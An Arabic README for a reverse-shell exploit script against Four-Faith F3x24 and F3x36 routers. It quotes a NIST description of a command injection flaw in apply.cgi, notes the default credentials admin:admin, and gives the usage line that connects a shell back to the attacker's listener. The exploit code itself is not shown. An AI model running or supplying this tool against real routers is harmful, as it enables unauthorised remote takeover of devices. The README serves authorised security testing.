
استغلال لأجهزة توجيه Four-Faith للحصول على قشرة عكسية
هذا استغلال (Exploit) لطرازات راوتر Four-Faith F3x24 وF3x36 للحصول على شل عكسي (Reverse Shell).
"تتأثر طرازات راوتر Four-Faith F3x24 وF3x36 بثغرة حقن أوامر نظام التشغيل (OS). يسمح إصدار البرنامج الثابت 2.0 على الأقل للمهاجمين المصادق عليهم وعن بُعد بتنفيذ أوامر نظام تشغيل عشوائية عبر HTTP عند تعديل وقت النظام عبر apply.cgi. بالإضافة إلى ذلك، يحتوي هذا الإصدار من البرنامج الثابت على بيانات اعتماد افتراضية، والتي إذا لم يتم تغييرها، ستحوّل هذه الثغرة فعليًا إلى مشكلة تنفيذ أوامر نظام تشغيل عن بُعد دون مصادقة."
المصدر: nist.gov
يعتمد هذا السكربت على حمولة (Payload) تم رصدها بواسطة VulnCheck
قبل تشغيل الاستغلال، ابدأ خادم TCP على جهازك.
ثم شغّل
python exploit.py [-u USERNAME] [-p PASSWORD] [-rport REMOTE_PORT] RHOST LHOST LPORT
حيث
RHOST هو عنوان IP البعيد. يمكنك أيضًا إضافة نطاق (Domain).LHOST هو عنوان IP لخادم TCP على جهازك.LPORT هو منفذ خادم TCP الخاص بك.USERNAME و هما بيانات اعتماد الراوتر. الافتراضي هو admin:admin.PASSWORDRPORT هو المنفذ البعيد للراوتر. الافتراضي هو 80.تأكد من استخدام هذا الاستغلال فقط للاختبار وفي بيئات مصرح بها.
لا تستخدمه أبدًا لأغراض ضارة.